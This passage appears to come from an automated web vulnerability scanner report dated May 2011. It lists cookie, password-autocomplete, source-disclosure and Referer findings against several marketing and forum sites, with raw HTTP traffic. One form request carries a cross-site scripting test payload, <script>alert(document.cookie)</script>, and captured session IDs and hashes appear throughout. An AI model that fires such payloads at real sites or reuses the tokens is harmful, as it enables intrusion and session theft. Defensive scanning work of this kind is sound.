l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 13083
Content-Type: application/x-javascript
Last-Modified: Wed, 18 Mar 2009 04:21:08 GMT
Accept-Ranges: bytes
ETag: "578c6bf680a7c91:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:19 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

/* Starting 01-hubspot-lib.js */

/*    EventCache Version 1.0
   Copyright 2005 Mark Wubben

   Provides a way for automagically removing events from nodes and thus preventing memory leaka
...[SNIP]...

11.116. http://www.lifestreetmedia.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifestreetmedia.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cs=ip633-CEvB43Ht2XACYt9exboTgg; path=/; domain=.www.lifestreetmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lifestreetmedia.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 15 May 2011 16:53:20 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=10
Cache-Control: max-age=3600
Expires: Sun, 15 May 2011 17:53:20 GMT
Vary: Accept-Encoding
Set-Cookie: cs=ip633-CEvB43Ht2XACYt9exboTgg; path=/; domain=.www.lifestreetmedia.com
Content-Length: 7992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

11.117. http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rightscale.com
Path:	/lp/social-gaming-screencast-vip-trial.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cookie[RS_ls]=Advertising%2FSponsorship; path=/
cookie[RS_sd]=InsideFacebook; path=/
cookie[RS_campaign]=70170000000ftey; path=/
cookie[RS_campaign_status]=Responded; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lp/social-gaming-screencast-vip-trial.php?ls=Advertising%2FSponsorship&sd=InsideFacebook&campaign=70170000000ftey&campaign_status=Responded&utm_source=InsideFacebook&utm_medium=banner&utm_content=200x200&utm_campaign=SocialGaming HTTP/1.1
Host: www.rightscale.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.12
Set-Cookie: cookie[RS_ls]=Advertising%2FSponsorship; path=/
Set-Cookie: cookie[RS_sd]=InsideFacebook; path=/
Set-Cookie: cookie[RS_campaign]=70170000000ftey; path=/
Set-Cookie: cookie[RS_campaign_status]=Responded; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Sign
...[SNIP]...

11.118. http://www.votigo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.votigo.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CAKEPHP=5co1vcbv2toajmh0t1ac5c4et1; expires=Wed, 14-May-2036 22:54:50 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.votigo.com
Proxy-Connection: keep-alive
Referer: http://www.votigo.com/corp/solutions/fbcontests.php?insidefacebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NJMZMZS192.168.1.181CKMLM; __utmz=259995789.1305478397.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=259995789.1874215674.1305478397.1305478397.1305478397.1; __utmc=259995789; __utmb=259995789.1.10.1305478397

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:54:50 GMT
Server: Apache
Set-Cookie: CAKEPHP=5co1vcbv2toajmh0t1ac5c4et1; expires=Wed, 14-May-2036 22:54:50 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 39224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Video
...[SNIP]...

11.119. http://www.votigo.com/corp/solutions/fbcontests.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.votigo.com
Path:	/corp/solutions/fbcontests.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=NJMZMZS192.168.1.180CKMLK; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/solutions/fbcontests.php?insidefacebook HTTP/1.1
Host: www.votigo.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

12. Password field with autocomplete enabled previous next
There are 3 instances of this issue:

http://gold.insidenetwork.com/facebook/
http://my.lifestreetmedia.com/login/register/
http://publishers.criteo.com/signup.aspx

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

12.1. http://gold.insidenetwork.com/facebook/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/

Issue detail

The page contains a form with the following action URL:

http://gold.insidenetwork.com/facebook/gold/login.php

The form contains the following password field with autocomplete enabled:

amember_pass

Request

Response

12.2. http://my.lifestreetmedia.com/login/register/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://my.lifestreetmedia.com
Path:	/login/register/

Issue detail

The page contains a form with the following action URL:

http://my.lifestreetmedia.com/login/register/

The form contains the following password fields with autocomplete enabled:

pass1
pass2

Request

Response

12.3. http://publishers.criteo.com/signup.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://publishers.criteo.com
Path:	/signup.aspx

Issue detail

The page contains a form with the following action URL:

http://publishers.criteo.com/signup.aspx?lang=en-US

The form contains the following password fields with autocomplete enabled:

ctl00$MainContent$tbPassword
ctl00$MainContent$tbConfirmPassword
ctl00$MainContent$ctlLogin$ctlLogin$Password

Request

Response

13. Source code disclosure previous next
There are 2 instances of this issue:

/index.php
/public/js/3rd_party/prettify/prettify.js

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

13.1. http://community.invisionpower.com/index.php previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://community.invisionpower.com
Path:	/index.php

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /index.php?app=core&module=global&section=register&do=12 HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/index.php?app=core&module=global&section=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=161164207.1305476788.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/suite/demo.php; cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzC1rgVcMFuGBpc%2C; cforums_session_id=5dca7c9fb9e90b95600884298c88847a; maan_session_id=85182b43fa1fc5f365224d2744f2080d; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.3.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; __utma=161164207.2049003496.1305476788.1305476788.1305476788.1; __utmc=161164207; __utmb=161164207.5.10.1305476788

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:27:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=659a727ec3209b23ebbf4ca5157585f6; path=/; domain=community.invisionpower.com; httponly
Content-Length: 6587
Content-Type: text/html

<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=<% CHARSET %>" />
       <title>COPPA Permission Form</title>
   </head>

   <body>
   <h2>Invision Power Services: COPPA Permission
...[SNIP]...

13.2. http://community.invisionpower.com/public/js/3rd_party/prettify/prettify.js previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://community.invisionpower.com
Path:	/public/js/3rd_party/prettify/prettify.js

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /public/js/3rd_party/prettify/prettify.js HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); maan_session_id=42dba258540c68eecf8b0d153ac3f241; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.2.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; __utmz=161164207.1305476788.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/suite/demo.php; __utma=161164207.2049003496.1305476788.1305476788.1305476788.1; __utmc=161164207; __utmb=161164207.1.10.1305476788; cforums_session_id=00ab541548e39922d16233c04a35f3d4; cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzC1rgVcMFuGBpc%2C

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Tue, 04 May 2010 17:17:42 GMT
ETag: "3cbd-485c7e31a9980"
Accept-Ranges: bytes
Content-Length: 15549
Cache-Control: max-age=31536000
Expires: Mon, 14 May 2012 16:26:31 GMT
Content-Type: application/javascript

window.PR_SHOULD_USE_CONTINUATION=true,window.PR_TAB_WIDTH=8,window.PR_normalizedHtml=window.PR=window.prettyPrintOne=window.prettyPrint=void
0,window._pr_isIE6=function(){var a=navigator&&navigator.u
...[SNIP]...
</.test(b)?'default-markup':'default-code'),t[a]}V(s,['default-code']),V(S([],[['pln',/^[^<?]+/],['dec',/^<!\w[^>]*(?:>|$)/],['com',/^<\!--[\s\S]*?(?:-\->|$)/],['lang-',/^<\?([\s\S]+?)(?:\?>|$)/],['lang-',/^<%([\s\S]+?)(?:%>|$)/],['pun',/^(?:<[%?]|[%?]>
...[SNIP]...

14. Referer-dependent response previous next
There are 7 instances of this issue:

http://bstats.adbrite.com/click/bstats.gif
http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
http://community.invisionpower.com/index.php
http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA
http://www.conversionruler.com/bin/tracker.php
http://www.facebook.com/plugins/like.php
http://www.youtube.com/v/m0UQucWM0Zw

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

14.1. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Request 1

Response 1

Request 2

GET /click/bstats.gif?kid=47432242&bapid=10431&uid=680833 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: Apache="168362177x0.258+1305478400x-823564735"; path=/; domain=.adbrite.com; expires=Sat, 10-May-2031 16:53:20 GMT
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 16-May-2011 16:53:20 GMT
Set-Cookie: rb2=EAE; path=/; domain=.adbrite.com; expires=Sat, 13-Aug-2011 16:53:20 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiq2yK1MrDEsSiwwKK8xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 12-May-2021 16:53:20 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sun, 15 May 2011 16:53:20 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

14.2. http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://community.invisionpower.com
Path:	/blog/2568/entry-6080-social-groups-100-beta-released/

Request 1

Response 1

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=fe61fb3e0417e2a5c562b9ac767a3231; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Sat, 15-May-2010 16:26:25 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:26:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzCzrgVcMFuJBpg%2C; expires=Mon, 14-May-2012 16:26:26 GMT; path=/; domain=community.invisionpower.com
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<![CDATA[
       /* ---- URLs ---- */
       ipb.vars['base_url']            = 'http://community.invisionpower.com/index.php?s=fe61fb3e0417e2a5c562b9ac767a3231&';
       ipb.vars['board_url']            = 'http://community.invisionpower.com';
       ipb.vars['loading_img']        = 'http://community.invisionpower.com/public/style_images/master/loading.gif';
       ipb.vars['active_app']            = 'blog';
       ipb.vars['upload_url']            = 'http://community.invisionpower.com/uploads';
       /* ---- Member ---- */
       ipb.vars['member_id']            = parseInt( 0 );
       ipb.vars['is_supmod']            = parseInt( 0 );
       ipb.vars['is_admin']            = parseInt( 0 );
       ipb.vars['secure_hash']        = '880ea6a14ea49e853634fbdc5015a024';
       ipb.vars['session_id']            = 'fe61fb3e0417e2a5c562b9ac767a3231';
       ipb.vars['can_befriend']        = true;
       ipb.vars['twitter_id']            = 0;
       ipb.vars['fb_uid']                = 0;
       /* ---- cookies ----- */
       ipb.vars['cookie_id']            = 'cforums_';
       ipb.vars['cookie_domain']        = 'community.invisionpower.com';
       ipb.vars['cookie_path']            = '/';
       /* ---- Rate imgs ---- */
       ipb.vars['rate_img_on']            = 'http://community.invisionpower.com/public/style_images/master/bullet_star.png';
       ipb.vars['rate_img_off']        = 'http://community.invisionpower.com/public/style_images/master/bullet_star_off.png';
       ipb.vars['rate_img_rated']        = 'http://community.invisionpower.com/public/style_images/master/bullet_star_rated.png';
       /* ---- Uploads ---- */
       ipb.vars['swfupload_swf']        = 'http://community.invisionpower.com/public/js/3rd_party/swfupload/swfupload.swf';
       ipb.vars['swfupload_enabled']    = true;
       ipb.vars['use_swf_upload']        = ( '' == 'flash' ) ? true : false;
       ipb.vars['swfupload_debug']        = false; /* SKINNOTE: Turn off for production */
       /* ---- other ---- */
       ipb.vars['live_search_limit']    = 4;
       ipb.vars['highlight_color']        = "#ade57a";
       ipb.vars['charset']                = "iso-8859-1";
       ipb.vars['use_rte']                = 1;
       ipb.vars['image_resize']        = 1;
       ipb.vars['image_resize_force'] = 650;
       ipb.vars['seo_enabled']            = 1;

       ipb.vars['seo_params']            = {"start":"-","end":"\/","varBlock":"\/page__","varSep":"__"};

       /* Templates/Language */
       ipb.templates['ajax_loadi
...[SNIP]...

Request 2

GET /blog/2568/entry-6080-social-groups-100-beta-released/ HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); maan_session_id=42dba258540c68eecf8b0d153ac3f241; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.2.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; cforums_session_id=c5daf8d6501375bf01485ccbb898af93; __utmz=161164207.1305476788.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/suite/demo.php; __utma=161164207.2049003496.1305476788.1305476788.1305476788.1; __utmc=161164207; __utmb=161164207.1.10.1305476788

Response 2

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:27:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f11f600a6c9e528272e3ef5f5e0f17aa; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Sat, 15-May-2010 16:27:27 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:27:30 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTezMLGwrgVcMFuEBpc%2C; expires=Mon, 14-May-2012 16:27:30 GMT; path=/; domain=community.invisionpower.com
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 64786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<![CDATA[
       /* ---- URLs ---- */
       ipb.vars['base_url']            = 'http://community.invisionpower.com/index.php?s=f11f600a6c9e528272e3ef5f5e0f17aa&';
       ipb.vars['board_url']            = 'http://community.invisionpower.com';
       ipb.vars['loading_img']        = 'http://community.invisionpower.com/public/style_images/master/loading.gif';
       ipb.vars['active_app']            = 'blog';
       ipb.vars['upload_url']            = 'http://community.invisionpower.com/uploads';
       /* ---- Member ---- */
       ipb.vars['member_id']            = parseInt( 0 );
       ipb.vars['is_supmod']            = parseInt( 0 );
       ipb.vars['is_admin']            = parseInt( 0 );
       ipb.vars['secure_hash']        = '880ea6a14ea49e853634fbdc5015a024';
       ipb.vars['session_id']            = 'f11f600a6c9e528272e3ef5f5e0f17aa';
       ipb.vars['can_befriend']        = true;
       ipb.vars['twitter_id']            = 0;
